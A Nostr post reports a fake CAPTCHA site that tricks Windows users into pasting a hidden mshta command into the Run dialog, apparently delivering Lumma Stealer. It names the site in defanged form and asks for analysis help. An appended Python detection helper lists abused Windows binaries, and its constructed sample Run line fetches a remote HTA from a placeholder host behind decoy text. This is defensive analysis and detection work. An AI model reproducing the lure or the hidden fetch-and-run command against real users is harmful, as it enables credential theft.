UPDATE:
The malicious payload seems to be Lumma Stealer, which does not establish persistence on the victim's machine. It only affects Windows users.
Can anybody on Nostr do malware analysis in the wild?
This website shows a fake CAPTCHA only to Windows users. The CAPTCHA tricks the user into hitting Win + R and Ctrl + V to paste a seemingly innocent-looking verification ID into the Run dialog, which the website already copied to the user's clipboard upon visiting the site. It's easily missed that part of the pasted string is not visible and actually runs "mshta
The source code of the website has a heavily obfuscated script which seems to fetch and construct a payload that is eventually executed using eval() without any user input upon visiting the site. The site also seems to store some data to Ethereum smart contracts every few seconds for some reason.
I'm trying to figure out what the stage 2 mshta payload actually does, and whether the site actually runs something via the mshta utility that can escape the browser sandbox. The payload is fetched from some very short-lived command-and-control servers, so it's hard to scrape the payload code directly. Does someone have the expertise to investigate this?
The *malicious* website:
https://gameskeys(.)net/we-were-here-forever-controls-guide
#asknostr nostr:npub1f6ugxyxkknket3kkdgu4k0fu74vmshawermkj8d06sz6jts9t4kslazcka
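The post describes the two places a defender can catch this lure: the pasted Run line itself (a LOLBin command hidden behind decoy "verification" text) and the resulting process tree (explorer.exe spawning mshta with a URL, which is what Win + R produces). The following triage helper is an added example and is not code from the post or from the site being discussed. It assumes the hidden command is separated from the decoy by a run of whitespace or a comment marker; the sample Run line, the example.invalid URL and the Sysmon-style event records are constructed for illustration, not captured from the site.

```python
"""Triage helper for ClickFix-style clipboard lures (added example, not from the post).

Assumption: the command is pushed out of view by padding whitespace or a
comment marker (#, ::, & rem) before the human-facing decoy text.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Windows binaries commonly abused as the first stage of a paste-into-Run lure.
LOLBINS = {"mshta", "powershell", "pwsh", "cmd", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "curl", "msiexec"}

URL_RE = re.compile(r"(?i)\b(?:https?|hxxps?)://[^\s'\"<>]+")
# Separators that hide the real command from the narrow Run dialog (assumed layouts).
SPLIT_RE = re.compile(r"\s{4,}|\s#\s|\s::\s|\s&\s*rem\s", re.IGNORECASE)
DECOY_RE = re.compile(r"(?i)captcha|verif|not a robot")


@dataclass
class Verdict:
    malicious: bool
    lolbins: List[str]
    urls: List[str]
    decoy_text: str
    reasons: List[str] = field(default_factory=list)


def _basename(path: str) -> str:
    """'C:\\Windows\\System32\\mshta.exe' -> 'mshta'."""
    name = path.strip().strip('"\'').rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def _first_token(segment: str) -> str:
    seg = segment.strip()
    if not seg:
        return ""
    return _basename(re.split(r"[\s,;(]", seg, maxsplit=1)[0])


def triage_run_line(pasted: str) -> Verdict:
    """Classify a string the user would paste into Win + R."""
    segments = [s for s in SPLIT_RE.split(pasted) if s and s.strip()]
    lolbins, reasons, decoy = [], [], ""
    for seg in segments:
        tok = _first_token(seg)
        if tok in LOLBINS:
            lolbins.append(tok)
            reasons.append(f"segment starts with LOLBin {tok!r}")
        elif DECOY_RE.search(seg):
            decoy = seg.strip()
            reasons.append("segment is human-facing decoy text")
    urls = URL_RE.findall(pasted)
    if urls:
        reasons.append("remote URL in Run line")
    if len(segments) > 1 and lolbins:
        reasons.append("command separated from decoy by padding or comment marker")
    # A bare LOLBin alone is not enough: 'powershell' typed by an admin is normal.
    malicious = bool(lolbins) and (bool(urls) or len(segments) > 1)
    return Verdict(malicious, lolbins, urls, decoy, reasons)


def suspicious_process_event(event: Dict[str, str]) -> bool:
    """Win + R launch pattern: explorer.exe -> LOLBin whose command line carries a URL."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    return (parent == "explorer" and image in LOLBINS
            and bool(URL_RE.search(event.get("CommandLine", ""))))


def flag_events(events: List[Dict[str, str]]) -> List[int]:
    """Indices of process-creation records matching the lure pattern."""
    return [i for i, ev in enumerate(events) if suspicious_process_event(ev)]


# Constructed sample: padding hides the mshta call behind the decoy text.
SAMPLE_PASTE = ('mshta https://example.invalid/verify.hta        '
                '# "I am not a robot - reCAPTCHA Verification ID: 7391"')

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": SAMPLE_PASTE},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    v = triage_run_line(SAMPLE_PASTE)
    print(v.malicious, v.lolbins, v.urls, v.reasons)
    print("flagged events:", flag_events(SAMPLE_EVENTS))
```

The Run-line check deliberately requires more than a LOLBin name, since an administrator typing `powershell` into Win + R is routine; it is the combination of a LOLBin, a remote URL and decoy text hidden behind a separator that characterises this lure. The process-tree check is the same idea expressed over telemetry and is what a Sysmon or EDR rule would key on.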